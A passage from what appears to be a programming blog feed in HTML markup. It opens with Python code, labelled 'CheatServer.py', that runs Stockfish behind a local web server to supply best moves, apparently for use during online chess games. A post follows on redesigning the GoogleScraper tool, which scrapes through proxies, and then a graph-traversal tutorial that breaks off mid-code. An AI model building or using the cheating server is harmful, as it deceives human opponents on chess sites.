<span class="bp">self</span><span class="o">.</span><span class="n">stockfish_plays_white</span> <span class="o">=</span> <span class="n">stockfish_plays_white</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">fen</span> <span class="o">=</span> <span class="s1">''</span>
<span class="bp">self</span><span class="o">.</span><span class="n">init_stockfish</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">poll</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">sleep_time</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span>
<span class="k">if</span> <span class="n">poll</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'isready</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">sleep_time</span><span class="p">)</span>
<span class="n">line</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">line</span>
<span class="k">if</span> <span class="s1">'readyok'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">if</span> <span class="s1">'bestmove'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">init_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]],</span> <span class="n">universal_newlines</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">)</span>
<span class="n">greeting</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="s1">'Stockfish'</span> <span class="ow">in</span> <span class="n">greeting</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'Couldnt execute stockfish'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'uci</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">()</span>
<span class="c1"># stolen from https://github.com/brandonhsiao/lichess-bot/blob/master/server.py</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">()</span>
<span class="c1"># some of theese options are not supported. Doesn't harm us...</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Hash value 128</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Threads value 4</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Best Book Move value true</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Aggressiveness value 200</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Cowardice value 0</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Contempt Factor value 50</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'No stockfish binary path given'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">whos_move_is_it</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="s1">'white'</span> <span class="k">if</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">moves</span><span class="p">)</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">else</span> <span class="s1">'black'</span>
<span class="k">def</span> <span class="nf">start_move_calculation</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">remaining_time</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">increment_time</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> When remaining_time and increment_time are given, the best move</span>
<span class="sd"> is calculated considering the remaining time. If not, the thinking_time</span>
<span class="sd"> given in the config is considered.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="n">remaining_time</span> <span class="ow">and</span> <span class="n">increment_time</span><span class="p">:</span>
<span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">increment_time</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">whos_move_is_it</span><span class="p">()</span> <span class="o">==</span> <span class="s1">'white'</span><span class="p">:</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'go wtime </span><span class="si">{}</span><span class="s1"> winc </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'go btime </span><span class="si">{}</span><span class="s1"> binc </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
<span class="n">out</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">poll</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'go infinite</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">sleep_time</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span> <span class="o"><</span> <span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="k">else</span> <span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">sleep_time</span><span class="p">))</span>
<span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">ve</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">ve</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'stop</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">out</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">poll</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">bestmove</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'bestmove\s(?P[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'move'</span><span class="p">)</span>
<span class="n">ponder</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'ponder\s(?P[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'ponder'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="n">bestmove</span><span class="p">,</span> <span class="n">ponder</span>
<span class="k">def</span> <span class="nf">newgame_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">stockfish_plays_white</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">fen</span><span class="o">=</span><span class="s1">''</span><span class="p">,</span>
<span class="n">all_moves</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">remaining_time</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">increment_time</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stockfish_plays_white</span> <span class="o">=</span> <span class="n">stockfish_plays_white</span>
<span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">if</span> <span class="n">fen</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">fen</span> <span class="o">=</span> <span class="n">fen</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position fen </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fen</span><span class="p">))</span>
<span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">start_move_calculation</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
<span class="k">if</span> <span class="n">all_moves</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="n">all_moves</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
<span class="k">if</span> <span class="n">all_moves</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position startpos moves </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">all_moves</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position startpos</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">start_move_calculation</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">quit_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'quit</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">terminate</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">StockfishServer</span><span class="p">(</span><span class="n">BaseHTTPRequestHandler</span><span class="p">):</span>
<span class="k">def</span> <span class="nf">get_param</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">names</span><span class="p">):</span>
<span class="k">if</span> <span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">names</span><span class="p">,</span> <span class="nb">tuple</span><span class="p">):</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'variable "names" must be a tuple'</span><span class="p">)</span>
<span class="n">ns</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">name</span> <span class="ow">in</span> <span class="n">names</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">ns</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'</span><span class="si">{name}</span><span class="s1">/(?P<</span><span class="si">{name}</span><span class="s1">>[^/]*?)/'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="n">name</span><span class="p">),</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">ns</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">return</span> <span class="n">ns</span>
<span class="k">def</span> <span class="nf">do_GET</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">send_header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Origin'</span><span class="p">,</span> <span class="s1">'*'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">send_header</span><span class="p">(</span><span class="s1">'Content-type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">end_headers</span><span class="p">()</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'/lastPosFen/'</span><span class="p">):</span>
<span class="n">fen</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_param</span><span class="p">((</span><span class="s1">'lastPosFen'</span><span class="p">,</span> <span class="p">))</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'lastPosFen'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span>
<span class="n">best</span><span class="p">,</span> <span class="n">ponder</span> <span class="o">=</span> <span class="n">engine</span><span class="o">.</span><span class="n">newgame_stockfish</span><span class="p">(</span><span class="n">fen</span><span class="o">=</span><span class="n">unquote</span><span class="p">(</span><span class="n">fen</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">wfile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">best</span> <span class="o">+</span> <span class="s1">' '</span> <span class="o">+</span> <span class="n">ponder</span><span class="p">,</span> <span class="s2">"utf-8"</span><span class="p">))</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'/allMoves/'</span><span class="p">):</span>
<span class="n">params</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_param</span><span class="p">((</span><span class="s1">'allMoves'</span><span class="p">,</span> <span class="s1">'remainingTime'</span><span class="p">,</span> <span class="s1">'incrementTime'</span><span class="p">))</span>
<span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'debug'</span><span class="p">,</span> <span class="kc">False</span><span class="p">):</span>
<span class="n">pprint</span><span class="o">.</span><span class="n">pprint</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
<span class="n">best</span><span class="p">,</span> <span class="n">ponder</span> <span class="o">=</span> <span class="n">engine</span><span class="o">.</span><span class="n">newgame_stockfish</span><span class="p">(</span>
<span class="n">all_moves</span><span class="o">=</span><span class="n">unquote</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s1">'allMoves'</span><span class="p">]),</span>
<span class="n">remaining_time</span><span class="o">=</span><span class="n">params</span><span class="p">[</span><span class="s1">'remainingTime'</span><span class="p">],</span>
<span class="n">increment_time</span><span class="o">=</span><span class="n">params</span><span class="p">[</span><span class="s1">'incrementTime'</span><span class="p">])</span>
<span class="bp">self</span><span class="o">.</span><span class="n">wfile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">best</span> <span class="o">+</span> <span class="s1">' '</span> <span class="o">+</span> <span class="n">ponder</span><span class="p">,</span> <span class="s2">"utf-8"</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">engine</span><span class="p">,</span> <span class="n">server_class</span><span class="o">=</span><span class="n">HTTPServer</span><span class="p">,</span> <span class="n">handler_class</span><span class="o">=</span><span class="n">StockfishServer</span><span class="p">):</span>
<span class="n">server_address</span> <span class="o">=</span> <span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="mi">8888</span><span class="p">)</span>
<span class="n">httpd</span> <span class="o">=</span> <span class="n">server_class</span><span class="p">(</span><span class="n">server_address</span><span class="p">,</span> <span class="n">handler_class</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Running CheatServer.py on </span><span class="si">{}</span><span class="s1">:</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">server_address</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">server_address</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="n">httpd</span><span class="o">.</span><span class="n">engine</span> <span class="o">=</span> <span class="n">engine</span>
<span class="n">httpd</span><span class="o">.</span><span class="n">serve_forever</span><span class="p">()</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">install_stockfish</span><span class="p">()</span>
<span class="n">engine</span> <span class="o">=</span> <span class="n">StockfishEngine</span><span class="p">()</span>
<span class="n">run</span><span class="p">(</span><span class="n">engine</span><span class="p">)</span>
</code></pre></div>A lot of work to do for GoogleScraper in the future and request for comments!2015-03-01T12:52:00+01:002015-03-01T12:52:00+01:00Nikolai Tschachertag:incolumitas.com,2015-03-01:/2015/03/01/a-lot-of-work-to-do-for-googlescraper-in-the-future-and-request-for-comments/<p>Hello dear readers</p>
<p>I get a lot of mail regarding questions about GoogleScraper. I really
appreciate them, but at some stage I cannot answer them anymore. In the
last weeks I didn't have a lot of time (and motivation I must admit) to
put into GoogleScraper.</p>
<p>The reason is, that I am still unconfortable with the architecture of
GoogleScraper. There are basically two ways to use the tool:</p>
<ul>
<li>As a command line tool</li>
<li>From another program over the API (programming approach)</li>
</ul>
<p>and furthermore there are 3 very different modes GoogleScraper runs in:</p>
<ul>
<li>http mode</li>
<li>selenium mode which again can be divided in Firefox, Chrome and
PhantomJS selenium browsers</li>
<li>asynchronous mode</li>
</ul>
<p>whereas I think that selenium is the hardest to work with (very buggy
and complex to program in). This leads to a complex software
architecture, mainly because the two operational modes (CLI tool and
API) have <em>different priorities of how to handle exceptions</em>.</p>
<p>The CLI tool should be VERY robust and it should to everything it can to
continue scraping with the remaining ressources (like proxies, RAM, when
lots of selenium instances become an issue, networking bandwith, ...),
because the user cannot handle these problems by himself when he calls
GoogleScraper …</p><p>Hello dear readers</p>
<p>I get a lot of mail regarding questions about GoogleScraper. I really
appreciate them, but at some stage I cannot answer them anymore. In the
last weeks I didn't have a lot of time (and motivation I must admit) to
put into GoogleScraper.</p>
<p>The reason is, that I am still unconfortable with the architecture of
GoogleScraper. There are basically two ways to use the tool:</p>
<ul>
<li>As a command line tool</li>
<li>From another program over the API (programming approach)</li>
</ul>
<p>and furthermore there are 3 very different modes GoogleScraper runs in:</p>
<ul>
<li>http mode</li>
<li>selenium mode which again can be divided in Firefox, Chrome and
PhantomJS selenium browsers</li>
<li>asynchronous mode</li>
</ul>
<p>whereas I think that selenium is the hardest to work with (very buggy
and complex to program in). This leads to a complex software
architecture, mainly because the two operational modes (CLI tool and
API) have <em>different priorities of how to handle exceptions</em>.</p>
<p>The CLI tool should be VERY robust and it should to everything it can to
continue scraping with the remaining ressources (like proxies, RAM, when
lots of selenium instances become an issue, networking bandwith, ...),
because the user cannot handle these problems by himself when he calls
GoogleScraper from the command line. It's better to just keep running
until we just can't anymore (no more proxies, networking failure, ...)</p>
<p>The API on the other hand should return the results of individual
workers as soon as possible to the caller. Maybe, the API user even
wants to stop GoogleScraper as soon as some sort of problem appears
(like: A proxy is detected, some sort of issue appears, ...)</p>
<p>These are two fundamentally different approaches and to guarantee the to
work both, a very sophisticatd middleware architecture is needed. To be
honest, in the beginning of GoogleScraper I wasn't aware of these
differences.</p>
<h3>Which tools to use?</h3>
<p>Another issue are the technology I currently use. I realized from
discussions with some people that were interested in GoogleScraper, that
there is a lot of good and stable software out there that could help me.
Right now I use hand crafted caching to store scraped data. But honestly
it would be much faster and less error prone to switch to Redis or
similar technologies. <a href="https://github.com/andymccurdy/redis-py" title="this python redis client">The python redis
client</a>
looks very promising and would help me improve the performance of
GoogleScraper immensly.</p>
<p>I am quite sure that there is other software that I <em>should</em> use but am
currently unaware of. Please kind people: <strong>Shoot me a short comment if
you have some hints and ideas what software thing I must absolutely
use!</strong></p>
<p>Before I begin programming I want to plan ahead and define some
milestone I want to reach. Currently I am reading a book about test
driven development and I feel that I have to read at least these two
books before I continue with GoogleScraper:</p>
<ul>
<li><a href="http://pages.cs.wisc.edu/~remzi/OSTEP/" title="operating systems book">Operating system
book</a></li>
<li><a href="http://chimera.labs.oreilly.com/books/1234000000754/index.html" title="test driven development">Test driven development
book</a></li>
</ul>
<p>Otherwise I will make other mistakes and I will never arise at a stable
and mature software. And I think the people would like to use such a
tool. I got 450 stars on github over the last year and I feel like there
is a lot of interest in this area. And I want to be the man who delivers
such a tool :)</p>
<h3>Please help me!</h3>
<p>This may sound a bit hypocrite because all of you already helped me a
great deal (and I still have around 30 issues to resolve on Github), but
I especially need some tips about the architecture and ideas how to
design the framework of GoogleScraper. Leave some comments please :)</p>
<p>Best Regards</p>
<p>Nikolai</p>
<p><strong>This post is not completed yet. I will update it and use it as a rough
outline for improvements of GoogleScraper</strong></p>Implementing two Graph traversal algorithms in Python: Depth First Search and Breadth First Search2015-01-24T19:40:00+01:002015-01-24T19:40:00+01:00Nikolai Tschachertag:incolumitas.com,2015-01-24:/2015/01/24/implementing-two-graph-traversal-algorithms-in-python-depth-first-search-and-breadth-first-search/<h3>Depth First Search and Breadth First Search</h3>
<p>I am right in front of a ton of exams and I need to learn about
algorithms and data structures. When I read about pseudocode of Graph
traversal algorithms, I thought:<br>
Why not actually implement them in a real programming language? So I
did so and now you can study my code now here. I guess this problem was
solved a thousand times before, but I learnt something and I hope my
approach has some uniqueness to it.</p>
<p>Additionlay, you can also generate a topological order after you
traversed the whole Graph, which is a nice little extra.</p>
<p>If you want the most recent version of the code, you can visit its own
<a href="https://github.com/NikolaiT/TraversingGraphs" title="github repo">Github repo
here</a>.</p>
<p>Well, here's the code. Just download and run it like this: <code>python graph_traversal.py</code></p>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
<span class="n">__author__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__version__</span> <span class="o">=</span> <span class="s1">'0.1'</span>
<span class="n">__contact__</span> <span class="o">=</span> <span class="s1">'admin@incolumitas.com'</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">deque</span>
<span class="sd">"""</span>
<span class="sd">This is just a little representation of two basic graph traversal methods.</span>
<span class="sd"> - Depth-First-Search</span>
<span class="sd"> - Breadth-First-Search</span>
<span class="sd">It's by no means meant to be fast or performant. Rather it is for educational</span>
<span class="sd">purposes and to understand it better for myself.</span>
<span class="sd">"""</span>
<span class="k">class</span> <span class="nc">Node</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="sd">"""Represents a node …</span></code></pre></div><h3>Depth First Search and Breadth First Search</h3>
<p>I am right in front of a ton of exams and I need to learn about
algorithms and data structures. When I read about pseudocode of Graph
traversal algorithms, I thought:<br>
Why not actually implement them in a real programming language? So I
did so and now you can study my code now here. I guess this problem was
solved a thousand times before, but I learnt something and I hope my
approach has some uniqueness to it.</p>
<p>Additionlay, you can also generate a topological order after you
traversed the whole Graph, which is a nice little extra.</p>
<p>If you want the most recent version of the code, you can visit its own
<a href="https://github.com/NikolaiT/TraversingGraphs" title="github repo">Github repo
here</a>.</p>
<p>Well, here's the code. Just download and run it like this: <code>python graph_traversal.py</code></p>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
<span class="n">__author__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__version__</span> <span class="o">=</span> <span class="s1">'0.1'</span>
<span class="n">__contact__</span> <span class="o">=</span> <span class="s1">'admin@incolumitas.com'</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">deque</span>
<span class="sd">"""</span>
<span class="sd">This is just a little representation of two basic graph traversal methods.</span>
<span class="sd"> - Depth-First-Search</span>
<span class="sd"> - Breadth-First-Search</span>
<span class="sd">It's by no means meant to be fast or performant. Rather it is for educational</span>
<span class="sd">purposes and to understand it better for myself.</span>
<span class="sd">"""</span>
<span class="k">class</span> <span class="nc">Node</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="sd">"""Represents a node."""</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_visited</span> <span class="o">=</span> <span class="mi">0</span>
<span class="bp">self</span><span class="o">.</span><span class="n">discovery_time</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">finishing_time</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">def</span> <span class="nf">neighbors</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">adjacency_list</span><span class="p">):</span>
<span class="k">return</span> <span class="n">adjacency_list</span><span class="p">[</span><span class="bp">self</span><span class="p">]</span>
<span class="nd">@property</span>
<span class="k">def</span> <span class="nf">visited</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">_visited</span>
<span class="nd">@visited</span><span class="o">.</span><span class="n">setter</span>
<span class="k">def</span> <span class="nf">visited</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="k">if</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
